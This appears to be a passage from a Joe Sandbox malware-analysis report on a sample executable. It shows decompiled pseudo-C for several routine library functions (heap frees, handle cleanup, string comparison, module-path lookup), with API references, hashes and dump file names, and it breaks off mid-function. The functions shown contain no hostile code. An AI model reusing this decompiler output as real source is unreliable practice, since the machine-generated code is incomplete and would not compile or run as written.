Function 00B70EED Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B70EED(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				long* _t20;
				void** _t26;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(0xb92641);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00B711CF(__ecx);
				_t20 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t26 = _t28 + 4;
					do {
						E00B70FE4(_t22, _t30,  *_t26);
						CloseHandle( *_t26);
						_t20 = _t20 + 1;
						_t26 =  &(_t26[1]);
					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x00b70eed
0x00b70ef6
0x00b70ef8
0x00b70efd
0x00b70efe
0x00b70f08
0x00b70f0a
0x00b70f0f
0x00b70f11
0x00b70f21
0x00b70f2d
0x00b70f2f
0x00b70f32
0x00b70f34
0x00b70f3b
0x00b70f41
0x00b70f42
0x00b70f45
0x00b70f32
0x00b70f54
0x00b70f60
0x00b70f6c
0x00b70f77
0x00b70f80

APIs

Part of subcall function 00B711CF: ResetEvent.KERNEL32(?), ref: 00B711E1
Part of subcall function 00B711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B711F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B70F21
CloseHandle.KERNEL32(?,?), ref: 00B70F3B
DeleteCriticalSection.KERNEL32(?), ref: 00B70F54
CloseHandle.KERNEL32(?), ref: 00B70F60
CloseHandle.KERNEL32(?), ref: 00B70F6C

Part of subcall function 00B70FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B71101,?,?,00B7117F,?,?,?,?,?,00B71169), ref: 00B70FEA
Part of subcall function 00B70FE4: GetLastError.KERNEL32(?,?,00B7117F,?,?,?,?,?,00B71169), ref: 00B70FF6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 225686f350b067986092a2c89008fe1a2713d10e9cd0f1d1191a88f63db9186b
Instruction ID: ecd5493854f3e4f7d039ba863d8dc1f110834f4f9068f5b54378c7a0b77bf285
Opcode Fuzzy Hash: 225686f350b067986092a2c89008fe1a2713d10e9cd0f1d1191a88f63db9186b
Instruction Fuzzy Hash: 8E015E72500744EFC722AF64DD85BC6FBE9FB08B10F00496AF26A92560CB757A44CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C7FF Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B8C7FF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xb9eea0; // 0xb9ee94
					if(_t23 != 0) {
						E00B88DCC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xb9eea4; // 0xbc26fc
					if(_t24 != 0) {
						E00B88DCC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xb9eea8; // 0xbc26fc
					if(_t25 != 0) {
						E00B88DCC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xb9eed0; // 0xb9ee98
					if(_t26 != 0) {
						E00B88DCC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xb9eed4; // 0xbc2700
					if(_t27 != 0) {
						return E00B88DCC(_t6);
					}
				}
				return _t6;
			}

0x00b8c805
0x00b8c80a
0x00b8c80e
0x00b8c814
0x00b8c817
0x00b8c81c
0x00b8c820
0x00b8c826
0x00b8c829
0x00b8c82e
0x00b8c832
0x00b8c838
0x00b8c83b
0x00b8c840
0x00b8c844
0x00b8c84a
0x00b8c84d
0x00b8c852
0x00b8c853
0x00b8c856
0x00b8c85c
0x00000000
0x00b8c864
0x00b8c85c
0x00b8c867

APIs

_free.LIBCMT ref: 00B8C817

Part of subcall function 00B88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?), ref: 00B88DE2
Part of subcall function 00B88DCC: GetLastError.KERNEL32(?,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?,?), ref: 00B88DF4

_free.LIBCMT ref: 00B8C829
_free.LIBCMT ref: 00B8C83B
_free.LIBCMT ref: 00B8C84D
_free.LIBCMT ref: 00B8C85F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0522bf9a5b7b3b4cbd26c9313e934903850bf185d2fdf866f6676e0409f4b285
Instruction ID: 6e7e19a39d8d49a53f3b63bd068263d0d35bf45739791c9f20c89f18e99a9c30
Opcode Fuzzy Hash: 0522bf9a5b7b3b4cbd26c9313e934903850bf185d2fdf866f6676e0409f4b285
Instruction Fuzzy Hash: 89F01272544601EB8660FB68E585C2677EAEB0071479518AEF118D7672CF70FC80CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00B71FDD Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B71FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t10;
				int _t22;
				int _t23;

				_t10 = E00B83E13(_a4);
				_t23 = _a12;
				if(_t10 + 1 >= _t23) {
					_t22 = _t23;
				} else {
					_t4 = E00B83E13(_a4) + 1; // 0x1
					_t22 = _t4;
				}
				if(E00B83E13(_a8) + 1 < _t23) {
					_t7 = E00B83E13(_a8) + 1; // 0x1
					_t23 = _t7;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
			}

0x00b71fe5
0x00b71fea
0x00b71ff1
0x00b72001
0x00b71ff3
0x00b71ffc
0x00b71ffc
0x00b71ffc
0x00b7200f
0x00b7201a
0x00b7201a
0x00b7201a
0x00b7203b

APIs

_wcslen.LIBCMT ref: 00B71FE5
_wcslen.LIBCMT ref: 00B71FF6
_wcslen.LIBCMT ref: 00B72006
_wcslen.LIBCMT ref: 00B72014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B6B371,?,?,00000000,?,?,?), ref: 00B7202F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 1aa0f32ec4c3803f6a4f99b867b383a6af1d783f800240a902132bcac186ff47
Instruction ID: 47953be095aefa627a808f127b4ea94de20acf7fa5a95101ec834240adab511c
Opcode Fuzzy Hash: 1aa0f32ec4c3803f6a4f99b867b383a6af1d783f800240a902132bcac186ff47
Instruction Fuzzy Hash: AFF01D32008014BBCF266F51EC09D8E7FA6EB44F62B118495F62A5B061CB72D661D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B88900 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B88900(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xb9ee90; // 0x31a1f48
					if(_t7 != 0xb9ec70) {
						E00B88DCC(_t7);
						 *0xb9ee90 = 0xb9ec70;
					}
				}
				E00B88DCC( *0xbc2280);
				 *0xbc2280 = 0;
				E00B88DCC( *0xbc2284);
				 *0xbc2284 = 0;
				E00B88DCC( *0xbc26d0);
				 *0xbc26d0 = 0;
				E00B88DCC( *0xbc26d4);
				 *0xbc26d4 = 0;
				return 1;
			}

0x00b88909
0x00b8890d
0x00b8890f
0x00b8891b
0x00b8891e
0x00b88924
0x00b88924
0x00b8891b
0x00b88930
0x00b8893d
0x00b88943
0x00b8894e
0x00b88954
0x00b8895f
0x00b88965
0x00b8896d
0x00b88976

APIs

_free.LIBCMT ref: 00B8891E

Part of subcall function 00B88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?), ref: 00B88DE2
Part of subcall function 00B88DCC: GetLastError.KERNEL32(?,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?,?), ref: 00B88DF4

_free.LIBCMT ref: 00B88930
_free.LIBCMT ref: 00B88943
_free.LIBCMT ref: 00B88954
_free.LIBCMT ref: 00B88965

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41b2f90942080036768cb1954ade8f5587e0e8d423f2f8c3f7f0f7822cc2335a
Instruction ID: f7095701452df8dad3a3c5a182a8dfc42637c7aa7b90d2e1ac867e0de5f07115
Opcode Fuzzy Hash: 41b2f90942080036768cb1954ade8f5587e0e8d423f2f8c3f7f0f7822cc2335a
Instruction Fuzzy Hash: F6F0FE72810522DBCA46BF14FD028153FF2F72C72478115AAF5245B3B2CF718942EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B715FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00B715FE(intOrPtr* __ecx) {
				char _v516;
				char _v5124;
				signed int _t33;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				void* _t61;
				void* _t62;

				E00B7EC50(0x1400);
				_t57 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_t61 = _t33 - 0x74;
				if(_t61 > 0) {
					__eflags = _t33 - 0x83;
					if(_t33 == 0x83) {
						E00B7D694();
						__eflags =  *(_t57 + 4);
						if( *(_t57 + 4) == 0) {
							E00B70602( &_v5124, E00B6E617(0xc9), 0xa00);
						} else {
							E00B64092( &_v5124, 0xa00, E00B6E617(0xca),  *(_t57 + 4));
						}
						return E00B7A7E4( *0xba8450,  &_v5124, E00B6E617(0x96), 0);
					}
				} else {
					if(_t61 == 0) {
						_push(0x456);
						L38:
						_push(E00B6E617());
						_push( *_t57);
						L19:
						_t45 = E00B7B776();
						L11:
						return _t45;
					}
					_t62 = _t33 - 0x16;
					if(_t62 > 0) {
						__eflags = _t33 - 0x38;
						if(__eflags > 0) {
							_t46 = _t33 - 0x39;
							__eflags = _t46;
							if(_t46 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t47 = _t46 - 1;
							__eflags = _t47;
							if(_t47 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t48 = _t47 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t51 = _t48 - 9;
							__eflags = _t51;
							if(_t51 == 0) {
								_push(0x343);
								goto L38;
							}
							_t33 = _t51 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t33 = _t33 - 0x17;
							__eflags = _t33 - 0xb;
							if(_t33 <= 0xb) {
								switch( *((intOrPtr*)(_t33 * 4 +  &M00B7190E))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L64;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00B6E617(0xc8) =  &_v516;
										__eax = E00B64092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00B7B776( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t62 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00B6E617();
							L7:
							_push(0);
							L8:
							return E00B7B776();
						}
						if(_t33 <= 0x15) {
							switch( *((intOrPtr*)(_t33 * 4 +  &M00B718B6))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00B7AECD();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00B6E617());
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L64;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00B6E617(0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00B6E617());
									_push( *_t57);
									goto L8;
							}
						}
					}
				}
				L64:
				return _t33;
			}

0x00b71606
0x00b7160c
0x00b7160e
0x00b71611
0x00b71614
0x00b7183f
0x00b71844
0x00b71846
0x00b7184b
0x00b7184f
0x00b7188c
0x00b71851
0x00b7186b
0x00b71870
0x00000000
0x00b718ab
0x00b7161a
0x00b7161a
0x00b71835
0x00b7175e
0x00b71763
0x00b71764
0x00b716a1
0x00b716a1
0x00b7166a
0x00000000
0x00b7166a
0x00b71620
0x00b71623
0x00b71723
0x00b71726
0x00b717e6
0x00b717e6
0x00b717e9
0x00b7182b
0x00000000
0x00b7182b
0x00b717eb
0x00b717eb
0x00b717ee
0x00b71824
0x00000000
0x00b71824
0x00b717f0
0x00b717f0
0x00b717f3
0x00b71817
0x00b7181a
0x00000000
0x00b7181a
0x00b717f5
0x00b717f5
0x00b717f8
0x00b7180d
0x00000000
0x00b7180d
0x00b717fa
0x00b717fa
0x00b717fd
0x00b71803
0x00000000
0x00b71803
0x00b7172c
0x00b7172c
0x00b717df
0x00000000
0x00b717df
0x00b71732
0x00b71735
0x00b71738
0x00b7173e
0x00000000
0x00b71745
0x00000000
0x00000000
0x00b7174f
0x00000000
0x00000000
0x00b71759
0x00000000
0x00000000
0x00b7176b
0x00000000
0x00000000
0x00b7176f
0x00000000
0x00000000
0x00b71773
0x00b71776
0x00000000
0x00000000
0x00b7177d
0x00000000
0x00000000
0x00b71784
0x00000000
0x00000000
0x00b7178b
0x00b7178e
0x00000000
0x00000000
0x00000000
0x00000000
0x00b71798
0x00b7179b
0x00000000
0x00000000
0x00b717b0
0x00b717bc
0x00b717c1
0x00b717c4
0x00b717ca
0x00000000
0x00000000
0x00b7173e
0x00b71738
0x00b71629
0x00b71629
0x00b7171a
0x00b7171c
0x00b716be
0x00b716be
0x00b71646
0x00b71646
0x00b71648
0x00000000
0x00b7164d
0x00b71632
0x00b71638
0x00000000
0x00b71655
0x00b71657
0x00b7165c
0x00000000
0x00000000
0x00b7163f
0x00b71641
0x00000000
0x00000000
0x00b71663
0x00b71665
0x00000000
0x00000000
0x00b71670
0x00b71673
0x00000000
0x00000000
0x00b7167f
0x00b71682
0x00000000
0x00000000
0x00b71686
0x00b71689
0x00000000
0x00000000
0x00b7168d
0x00b71690
0x00000000
0x00000000
0x00b71697
0x00b71699
0x00b7169e
0x00b7169f
0x00000000
0x00000000
0x00b716a9
0x00b716ac
0x00000000
0x00000000
0x00b716b0
0x00b716b3
0x00000000
0x00000000
0x00b716b7
0x00b716b9
0x00000000
0x00000000
0x00b716c6
0x00b716c8
0x00000000
0x00000000
0x00b716cf
0x00b716d2
0x00000000
0x00000000
0x00b716d9
0x00b716dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00b716e3
0x00b716e6
0x00b716ee
0x00000000
0x00000000
0x00b71703
0x00b71706
0x00000000
0x00000000
0x00b7170d
0x00b71710
0x00b71675
0x00b7167a
0x00b7167b
0x00000000
0x00000000
0x00b71638
0x00b71632
0x00b71623
0x00b718b2
0x00b718b2

APIs

_swprintf.LIBCMT ref: 00B717BC
_swprintf.LIBCMT ref: 00B7186B

Strings

%s: %s, xrefs: 00B717CB
%ls, xrefs: 00B71641, 00B71657

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 1149e51c0d41a2fde30c437db1fc4d7198d035ad9f57678655bd900d4b7ce36e
Instruction ID: 6997a8115e93cb0249aa563a1c4c1d2bdfb9d4f44cc002290da2afcdd2e33f69
Opcode Fuzzy Hash: 1149e51c0d41a2fde30c437db1fc4d7198d035ad9f57678655bd900d4b7ce36e
Instruction Fuzzy Hash: CD51E775248300F6E6251AAC8D86F3576F5AB05B04F24CDC6F3BE740E5D9A2E810673B

Uniqueness

Uniqueness Score: -1.00%

Function 00B87F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B87F6E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00B8BB30(_t52);
					GetModuleFileNameA(0, 0xbc2128, 0x104);
					_t49 =  *0xbc26d8; // 0x31923c0
					 *0xbc26e0 = 0xbc2128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xbc2128;
					}
					_v8 = 0;
					_v16 = 0;
					E00B88092(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00B88207(_v8, _v16, 1);
					if(_t64 != 0) {
						E00B88092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00B8B643(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xbc26cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xbc26d0 = _t59;
									L16:
									E00B88DCC(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xbc26cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xbc26d0 = _t43;
						goto L10;
					} else {
						_t44 = E00B891A8();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00B88DCC(_t64);
						return _t50;
					}
				} else {
					_t45 = E00B891A8();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00B89087();
					return _t65;
				}
			}

0x00b87f6e
0x00b87f7b
0x00b87f9b
0x00b87fae
0x00b87fb4
0x00b87fba
0x00b87fc2
0x00b87fc9
0x00b87fc9
0x00b87fce
0x00b87fd5
0x00b87fdc
0x00b87fee
0x00b87ff5
0x00b88014
0x00b88020
0x00b8803b
0x00b8803e
0x00b88045
0x00b8804b
0x00b88052
0x00b88055
0x00b88057
0x00b8805b
0x00b88065
0x00b88065
0x00b88067
0x00b8806d
0x00b88070
0x00b88072
0x00b88078
0x00b88079
0x00b8807f
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8805d
0x00b8805d
0x00b8805d
0x00b88060
0x00b88061
0x00000000
0x00b8805d
0x00b8804d
0x00000000
0x00b8804d
0x00b88026
0x00b8802b
0x00b8802d
0x00b8802f
0x00000000
0x00b87ff7
0x00b87ff7
0x00b87ffc
0x00b87ffe
0x00b87fff
0x00b88034
0x00b88034
0x00b88082
0x00b88083
0x00000000
0x00b8808c
0x00b87f83
0x00b87f83
0x00b87f8a
0x00b87f8b
0x00b87f8d
0x00000000
0x00b87f92

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1JCAVkYU3U.exe,00000104), ref: 00B87FAE
_free.LIBCMT ref: 00B88079
_free.LIBCMT ref: 00B88083

Strings

C:\Users\user\Desktop\1JCAVkYU3U.exe, xrefs: 00B87FA5, 00B87FAC, 00B87FDB, 00B88013

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\1JCAVkYU3U.exe
API String ID: 2506810119-3181337205
Opcode ID: 274bb2c0753932cb32498897b72cd85defeb69afa833ab7342337201f53c7556
Instruction ID: 825a3c4dda0d3e1202cf2cbda24540e4f5d6de5327019264ab1baf86daade7d7
Opcode Fuzzy Hash: 274bb2c0753932cb32498897b72cd85defeb69afa833ab7342337201f53c7556
Instruction Fuzzy Hash: 1D319071A44218AFDB21FF99DC84D9EBBF8EF95310F5440EAF904A7221DA718A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B831D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 61%

			E00B831D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				_t132 =  *_t96 - 0x80000003;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00B82AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
					_t133 =  *((intOrPtr*)(_t75 + 8));
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00B82AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00B80961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00B80894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
